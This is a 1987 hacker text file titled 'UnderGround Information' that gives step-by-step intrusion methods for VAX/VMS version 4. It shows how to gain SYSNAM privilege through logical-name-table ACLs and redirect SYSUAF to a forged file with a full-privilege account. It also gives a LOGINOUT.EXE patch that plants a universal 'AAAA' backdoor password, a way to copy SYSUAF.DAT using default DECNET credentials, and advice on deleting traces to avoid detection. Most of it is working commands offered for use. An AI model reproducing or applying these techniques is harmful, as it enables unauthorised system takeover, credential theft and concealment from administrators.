UnderGround Information
1. To get SYSNAM privilege under V4.2 do the following:-
$ SET ACL/OBJ=LOGICAL/ACL=(ID=[???,???],ACCESS=READ+WRITE+DELETE+CONTROL)
LNM$SYSTEM_TABLE
etc. on all there tables that you need access to. The problem with VMS is
that it allows ACLs on logical name tables, but anyone can put them on!
[???,???] is your UIC.
Or if you have another method of gaining SYSNAM priv you can do the
following..
Now that you have this ACL, you should be able to add an entry for SYSUAF,
you need the executor mode name, eg:
$ DEFINE/SYSTEM/EXEC SYSUAF $1$DISK1:[FRED]SYSUAF
If you have done a SET DEFAULT to [FRED] before hand and done this:
$ COPY SYS$SYSTEM:SYSUAF.DAT *
then you should be able to do:
$ RUN SYS$SYSTEM:AUTHORIZE
UAF>ADD FRED/PASS=FRED/PRIV=ALL/FLAG=NODISUSER
UAF>^Z
*EXIT*
You should now note that ANYONE logging onto the system will be checked
against the SYSUAF file in the [FRED] directory and NOT the SYS$SYSTEM
directory.. also anyone doing a SHOW LOGICAL will see a new entry in the
system name table.. ie. "SYSUAF" = SYS$SYSDEVICE:[FRED]SYSUAF
Its now all ready to test..
Try:
$ SET HOST 0
Username: FRED
Password: FRED
And hey presto.. your logged in with FULL privileges..
As entering an entry into the System logical table is a bit of a mass
giveaway of who is hacking the system it is a good idea to copy the sysuaf
file from the system direcxtory, and ALTERING your OWN account to have
full privs, doing this doesnt cause suspicsion if a new USERNAME appears.
So write a DCL command procedure that will:
A. Get SYSNAM priv
B. Enter the new logical name into the system table
C. Login
and write a routine that is called from your login.com file that does:
A. Checks for the SYSUAF entry in the system table
B. Deletes it if it is present.
Doing this will make the new definition for SYSUAF only appear for a fract-
ion of a second and will be very dificult to trace..
You should now be logged into your own account with FULL privs.. magic
really.. (I have tested this method and it works really well!)
2. Another approach (or extension to the last method) by getting write
access to LOGINOUT.EXE in SYS$SYSTEM is the following patch:
$SET DEFAULT SYS$SYSTEM:
$PATCH LOGINOUT
PATCH>REPALCE/INSTRUCTION 9D14
OLD>'MOVAB B^20(SP),B^1C(SP)'
OLD>EXIT
NEW>'CMPL B^20(SP),#41414141'
NEW>'BNEQ LBL'
NEW>'MOVL I^#1,R0'
NEW>'RET'
NEW>'LBL: MOVAB B^20(SP),B^1C(SP)'
NEW>EXIT
PATCH>UPDATE
$ INSTALL/REPLACE LOGINOUT.EXE
$ PURGE LOGINOUT.EXE
Then try logging in:
Username: SYSTEM
Password: AAAA
or
Username: ANY_ONE_WHO_EXISTS_ON_THIS_SYSTEM
Password: AAAA
This works for V4.2 and V4.3, probably V4.1 as well, check if the MOVAB is
at 9D14 with EXAMIN/INSTRUCTION.
3. On most machines you will find the following also works, (useful for
accessing protected files..)
To say copy the SYSUAF.DAT file to your own directory try:
$ COPY NODE"DECNET DECNET"::SYS$SYSTEM:SYSUAF.DAT *.*
Where NODE is your local node name (machine name, can be found by doing
SHOW NETWORK, the current node is the top one in the list)
If the above doesnt work then try removing the second DECNET within the
quotes.
The two words within the quotes are firstly the username and secondly the
password of an account that has NETWORK access, DECNET is likely to have
full access on most machines.
These hacks are copyright of Lightfinger. (c) 1987